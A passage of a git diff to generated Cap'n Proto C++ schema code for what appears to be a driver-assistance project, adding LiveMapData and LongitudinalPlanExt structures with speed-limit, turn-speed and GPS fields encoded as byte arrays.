::capnp::POINTERS)); -} - inline ::cereal::CarParams::SafetyModel CarParams::SafetyConfig::Reader::getSafetyModel() const { return _reader.getDataField< ::cereal::CarParams::SafetyModel>( ::capnp::bounded<0>() * ::capnp::ELEMENTS); diff --git a/cereal/gen/cpp/custom.capnp.c++ b/cereal/gen/cpp/custom.capnp.c++ index 0dc7e83b6..c87df2e36 100644 --- a/cereal/gen/cpp/custom.capnp.c++ +++ b/cereal/gen/cpp/custom.capnp.c++ @@ -5,82 +5,920 @@ namespace capnp { namespace schemas { -static const ::capnp::_::AlignedData<17> b_81c2f05a394cf4af = { +static const ::capnp::_::AlignedData<366> b_81c2f05a394cf4af = { { 0, 0, 0, 0, 5, 0, 6, 0, 175, 244, 76, 57, 90, 240, 194, 129, - 13, 0, 0, 0, 1, 0, 0, 0, + 13, 0, 0, 0, 1, 0, 8, 0, 89, 10, 85, 29, 102, 186, 38, 181, - 0, 0, 7, 0, 0, 0, 0, 0, + 4, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 21, 0, 0, 0, 234, 0, 0, 0, + 21, 0, 0, 0, 202, 0, 0, 0, 33, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, + 29, 0, 0, 0, 103, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 99, 117, 115, 116, 111, 109, 46, 99, - 97, 112, 110, 112, 58, 67, 117, 115, - 116, 111, 109, 82, 101, 115, 101, 114, - 118, 101, 100, 48, 0, 0, 0, 0, - 0, 0, 0, 0, 1, 0, 1, 0, } + 97, 112, 110, 112, 58, 76, 105, 118, + 101, 77, 97, 112, 68, 97, 116, 97, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 1, 0, 1, 0, + 80, 0, 0, 0, 3, 0, 4, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 1, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 33, 2, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 32, 2, 0, 0, 3, 0, 1, 0, + 44, 2, 0, 0, 2, 0, 1, 0, + 1, 0, 0, 0, 1, 0, 0, 0, + 0, 0, 1, 0, 1, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 41, 2, 0, 0, 90, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 40, 2, 0, 0, 3, 0, 1, 0, + 52, 2, 0, 0, 2, 0, 1, 0, + 2, 0, 0, 0, 1, 0, 0, 0, + 0, 0, 1, 0, 2, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 49, 2, 0, 0, 170, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 52, 2, 0, 0, 3, 0, 1, 0, + 64, 2, 0, 0, 2, 0, 1, 0, + 3, 0, 0, 0, 2, 0, 0, 0, + 0, 0, 1, 0, 3, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 61, 2, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 60, 2, 0, 0, 3, 0, 1, 0, + 72, 2, 0, 0, 2, 0, 1, 0, + 4, 0, 0, 0, 3, 0, 0, 0, + 0, 0, 1, 0, 4, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 69, 2, 0, 0, 194, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 72, 2, 0, 0, 3, 0, 1, 0, + 84, 2, 0, 0, 2, 0, 1, 0, + 5, 0, 0, 0, 2, 0, 0, 0, + 0, 0, 1, 0, 5, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 81, 2, 0, 0, 162, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 84, 2, 0, 0, 3, 0, 1, 0, + 96, 2, 0, 0, 2, 0, 1, 0, + 6, 0, 0, 0, 4, 0, 0, 0, + 0, 0, 1, 0, 6, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 93, 2, 0, 0, 122, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 92, 2, 0, 0, 3, 0, 1, 0, + 104, 2, 0, 0, 2, 0, 1, 0, + 7, 0, 0, 0, 5, 0, 0, 0, + 0, 0, 1, 0, 7, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 101, 2, 0, 0, 210, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 108, 2, 0, 0, 3, 0, 1, 0, + 120, 2, 0, 0, 2, 0, 1, 0, + 8, 0, 0, 0, 1, 0, 0, 0, + 0, 0, 1, 0, 8, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 117, 2, 0, 0, 154, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 120, 2, 0, 0, 3, 0, 1, 0, + 132, 2, 0, 0, 2, 0, 1, 0, + 9, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 1, 0, 9, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 129, 2, 0, 0, 170, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 132, 2, 0, 0, 3, 0, 1, 0, + 160, 2, 0, 0, 2, 0, 1, 0, + 10, 0, 0, 0, 1, 0, 0, 0, + 0, 0, 1, 0, 10, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 157, 2, 0, 0, 242, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 164, 2, 0, 0, 3, 0, 1, 0, + 192, 2, 0, 0, 2, 0, 1, 0, + 11, 0, 0, 0, 2, 0, 0, 0, + 0, 0, 1, 0, 11, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 189, 2, 0, 0, 210, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 196, 2, 0, 0, 3, 0, 1, 0, + 224, 2, 0, 0, 2, 0, 1, 0, + 12, 0, 0, 0, 3, 0, 0, 0, + 0, 0, 1, 0, 12, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 221, 2, 0, 0, 138, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 224, 2, 0, 0, 3, 0, 1, 0, + 236, 2, 0, 0, 2, 0, 1, 0, + 13, 0, 0, 0, 3, 0, 0, 0, + 0, 0, 1, 0, 13, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 233, 2, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 232, 2, 0, 0, 3, 0, 1, 0, + 244, 2, 0, 0, 2, 0, 1, 0, + 14, 0, 0, 0, 4, 0, 0, 0, + 0, 0, 1, 0, 14, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 241, 2, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 240, 2, 0, 0, 3, 0, 1, 0, + 252, 2, 0, 0, 2, 0, 1, 0, + 15, 0, 0, 0, 5, 0, 0, 0, + 0, 0, 1, 0, 15, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 249, 2, 0, 0, 138, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 252, 2, 0, 0, 3, 0, 1, 0, + 8, 3, 0, 0, 2, 0, 1, 0, + 16, 0, 0, 0, 12, 0, 0, 0, + 0, 0, 1, 0, 16, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 5, 3, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 4, 3, 0, 0, 3, 0, 1, 0, + 16, 3, 0, 0, 2, 0, 1, 0, + 17, 0, 0, 0, 13, 0, 0, 0, + 0, 0, 1, 0, 17, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 13, 3, 0, 0, 146, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 16, 3, 0, 0, 3, 0, 1, 0, + 28, 3, 0, 0, 2, 0, 1, 0, + 18, 0, 0, 0, 14, 0, 0, 0, + 0, 0, 1, 0, 18, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 25, 3, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 24, 3, 0, 0, 3, 0, 1, 0, + 36, 3, 0, 0, 2, 0, 1, 0, + 19, 0, 0, 0, 15, 0, 0, 0, + 0, 0, 1, 0, 19, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 33, 3, 0, 0, 210, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 40, 3, 0, 0, 3, 0, 1, 0, + 52, 3, 0, 0, 2, 0, 1, 0, + 115, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 86, 97, 108, 105, 100, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 115, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 115, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 65, 104, 101, 97, 100, 86, + 97, 108, 105, 100, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 115, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 65, 104, 101, 97, 100, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 115, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 65, 104, 101, 97, 100, 68, + 105, 115, 116, 97, 110, 99, 101, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 83, 112, 101, 101, + 100, 76, 105, 109, 105, 116, 86, 97, + 108, 105, 100, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 83, 112, 101, 101, + 100, 76, 105, 109, 105, 116, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 83, 112, 101, 101, + 100, 76, 105, 109, 105, 116, 69, 110, + 100, 68, 105, 115, 116, 97, 110, 99, + 101, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 83, 112, 101, 101, + 100, 76, 105, 109, 105, 116, 83, 105, + 103, 110, 0, 0, 0, 0, 0, 0, + 3, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 3, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 83, 112, 101, 101, + 100, 76, 105, 109, 105, 116, 115, 65, + 104, 101, 97, 100, 0, 0, 0, 0, + 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 3, 0, 1, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 83, 112, 101, 101, + 100, 76, 105, 109, 105, 116, 115, 65, + 104, 101, 97, 100, 68, 105, 115, 116, + 97, 110, 99, 101, 115, 0, 0, 0, + 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 3, 0, 1, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 83, 112, 101, 101, + 100, 76, 105, 109, 105, 116, 115, 65, + 104, 101, 97, 100, 83, 105, 103, 110, + 115, 0, 0, 0, 0, 0, 0, 0, + 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 3, 0, 1, 0, + 3, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 108, 97, 115, 116, 71, 112, 115, 84, + 105, 109, 101, 115, 116, 97, 109, 112, + 0, 0, 0, 0, 0, 0, 0, 0, + 5, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 5, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 99, 117, 114, 114, 101, 110, 116, 82, + 111, 97, 100, 78, 97, 109, 101, 0, + 12, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 12, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 108, 97, 115, 116, 71, 112, 115, 76, + 97, 116, 105, 116, 117, 100, 101, 0, + 11, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 11, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 108, 97, 115, 116, 71, 112, 115, 76, + 111, 110, 103, 105, 116, 117, 100, 101, + 0, 0, 0, 0, 0, 0, 0, 0, + 11, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 11, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 108, 97, 115, 116, 71, 112, 115, 83, + 112, 101, 101, 100, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 108, 97, 115, 116, 71, 112, 115, 66, + 101, 97, 114, 105, 110, 103, 68, 101, + 103, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 108, 97, 115, 116, 71, 112, 115, 65, + 99, 99, 117, 114, 97, 99, 121, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 108, 97, 115, 116, 71, 112, 115, 66, + 101, 97, 114, 105, 110, 103, 65, 99, + 99, 117, 114, 97, 99, 121, 68, 101, + 103, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, } }; ::capnp::word const* const bp_81c2f05a394cf4af = b_81c2f05a394cf4af.words; #if !CAPNP_LITE +static const uint16_t m_81c2f05a394cf4af[] = {13, 18, 19, 17, 14, 15, 16, 12, 1, 3, 4, 2, 0, 6, 7, 8, 5, 9, 10, 11}; +static const uint16_t i_81c2f05a394cf4af[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19}; const ::capnp::_::RawSchema s_81c2f05a394cf4af = { - 0x81c2f05a394cf4af, b_81c2f05a394cf4af.words, 17, nullptr, nullptr, - 0, 0, nullptr, nullptr, nullptr, { &s_81c2f05a394cf4af, nullptr, nullptr, 0, 0, nullptr } + 0x81c2f05a394cf4af, b_81c2f05a394cf4af.words, 366, nullptr, m_81c2f05a394cf4af, + 0, 20, i_81c2f05a394cf4af, nullptr, nullptr, { &s_81c2f05a394cf4af, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<17> b_aedffd8f31e7b55d = { +static const ::capnp::_::AlignedData<286> b_aedffd8f31e7b55d = { { 0, 0, 0, 0, 5, 0, 6, 0, 93, 181, 231, 49, 143, 253, 223, 174, - 13, 0, 0, 0, 1, 0, 0, 0, + 13, 0, 0, 0, 1, 0, 5, 0, 89, 10, 85, 29, 102, 186, 38, 181, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 21, 0, 0, 0, 234, 0, 0, 0, - 33, 0, 0, 0, 7, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, + 21, 0, 0, 0, 10, 1, 0, 0, + 37, 0, 0, 0, 55, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 101, 0, 0, 0, 79, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 99, 117, 115, 116, 111, 109, 46, 99, - 97, 112, 110, 112, 58, 67, 117, 115, - 116, 111, 109, 82, 101, 115, 101, 114, - 118, 101, 100, 49, 0, 0, 0, 0, - 0, 0, 0, 0, 1, 0, 1, 0, } + 97, 112, 110, 112, 58, 76, 111, 110, + 103, 105, 116, 117, 100, 105, 110, 97, + 108, 80, 108, 97, 110, 69, 120, 116, + 0, 0, 0, 0, 0, 0, 0, 0, + 12, 0, 0, 0, 1, 0, 1, 0, + 206, 31, 115, 238, 186, 117, 42, 180, + 17, 0, 0, 0, 210, 0, 0, 0, + 2, 8, 153, 155, 54, 132, 119, 158, + 25, 0, 0, 0, 186, 0, 0, 0, + 218, 174, 84, 82, 132, 78, 18, 209, + 29, 0, 0, 0, 210, 0, 0, 0, + 76, 111, 110, 103, 105, 116, 117, 100, + 105, 110, 97, 108, 80, 108, 97, 110, + 69, 120, 116, 83, 111, 117, 114, 99, + 101, 0, 0, 0, 0, 0, 0, 0, + 83, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 67, 111, 110, 116, 114, 111, + 108, 83, 116, 97, 116, 101, 0, 0, + 86, 105, 115, 105, 111, 110, 84, 117, + 114, 110, 67, 111, 110, 116, 114, 111, + 108, 108, 101, 114, 83, 116, 97, 116, + 101, 0, 0, 0, 0, 0, 0, 0, + 60, 0, 0, 0, 3, 0, 4, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 1, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 149, 1, 0, 0, 210, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 156, 1, 0, 0, 3, 0, 1, 0, + 168, 1, 0, 0, 2, 0, 1, 0, + 1, 0, 0, 0, 1, 0, 0, 0, + 0, 0, 1, 0, 1, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 165, 1, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 164, 1, 0, 0, 3, 0, 1, 0, + 176, 1, 0, 0, 2, 0, 1, 0, + 2, 0, 0, 0, 1, 0, 0, 0, + 0, 0, 1, 0, 2, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 173, 1, 0, 0, 186, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 176, 1, 0, 0, 3, 0, 1, 0, + 188, 1, 0, 0, 2, 0, 1, 0, + 3, 0, 0, 0, 2, 0, 0, 0, + 0, 0, 1, 0, 3, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 185, 1, 0, 0, 90, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 184, 1, 0, 0, 3, 0, 1, 0, + 196, 1, 0, 0, 2, 0, 1, 0, + 4, 0, 0, 0, 3, 0, 0, 0, + 0, 0, 1, 0, 4, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 193, 1, 0, 0, 138, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 196, 1, 0, 0, 3, 0, 1, 0, + 208, 1, 0, 0, 2, 0, 1, 0, + 5, 0, 0, 0, 4, 0, 0, 0, + 0, 0, 1, 0, 5, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 205, 1, 0, 0, 138, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 208, 1, 0, 0, 3, 0, 1, 0, + 220, 1, 0, 0, 2, 0, 1, 0, + 6, 0, 0, 0, 160, 0, 0, 0, + 0, 0, 1, 0, 6, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 217, 1, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 216, 1, 0, 0, 3, 0, 1, 0, + 228, 1, 0, 0, 2, 0, 1, 0, + 7, 0, 0, 0, 161, 0, 0, 0, + 0, 0, 1, 0, 7, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 225, 1, 0, 0, 170, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 228, 1, 0, 0, 3, 0, 1, 0, + 240, 1, 0, 0, 2, 0, 1, 0, + 8, 0, 0, 0, 6, 0, 0, 0, + 0, 0, 1, 0, 8, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 237, 1, 0, 0, 178, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 240, 1, 0, 0, 3, 0, 1, 0, + 252, 1, 0, 0, 2, 0, 1, 0, + 9, 0, 0, 0, 7, 0, 0, 0, + 0, 0, 1, 0, 9, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 249, 1, 0, 0, 90, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 248, 1, 0, 0, 3, 0, 1, 0, + 4, 2, 0, 0, 2, 0, 1, 0, + 10, 0, 0, 0, 8, 0, 0, 0, + 0, 0, 1, 0, 10, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 2, 0, 0, 82, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 2, 0, 0, 3, 0, 1, 0, + 12, 2, 0, 0, 2, 0, 1, 0, + 11, 0, 0, 0, 11, 0, 0, 0, + 0, 0, 1, 0, 11, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 9, 2, 0, 0, 178, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 12, 2, 0, 0, 3, 0, 1, 0, + 24, 2, 0, 0, 2, 0, 1, 0, + 12, 0, 0, 0, 18, 0, 0, 0, + 0, 0, 1, 0, 12, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 21, 2, 0, 0, 74, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 20, 2, 0, 0, 3, 0, 1, 0, + 32, 2, 0, 0, 2, 0, 1, 0, + 13, 0, 0, 0, 162, 0, 0, 0, + 0, 0, 1, 0, 13, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 29, 2, 0, 0, 122, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 28, 2, 0, 0, 3, 0, 1, 0, + 40, 2, 0, 0, 2, 0, 1, 0, + 14, 0, 0, 0, 19, 0, 0, 0, + 0, 0, 1, 0, 14, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 37, 2, 0, 0, 210, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 44, 2, 0, 0, 3, 0, 1, 0, + 56, 2, 0, 0, 2, 0, 1, 0, + 118, 105, 115, 105, 111, 110, 84, 117, + 114, 110, 67, 111, 110, 116, 114, 111, + 108, 108, 101, 114, 83, 116, 97, 116, + 101, 0, 0, 0, 0, 0, 0, 0, + 15, 0, 0, 0, 0, 0, 0, 0, + 218, 174, 84, 82, 132, 78, 18, 209, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 15, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 118, 105, 115, 105, 111, 110, 84, 117, + 114, 110, 83, 112, 101, 101, 100, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 115, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 67, 111, 110, 116, 114, 111, + 108, 83, 116, 97, 116, 101, 0, 0, + 15, 0, 0, 0, 0, 0, 0, 0, + 2, 8, 153, 155, 54, 132, 119, 158, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 15, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 115, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 115, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 79, 102, 102, 115, 101, 116, + 0, 0, 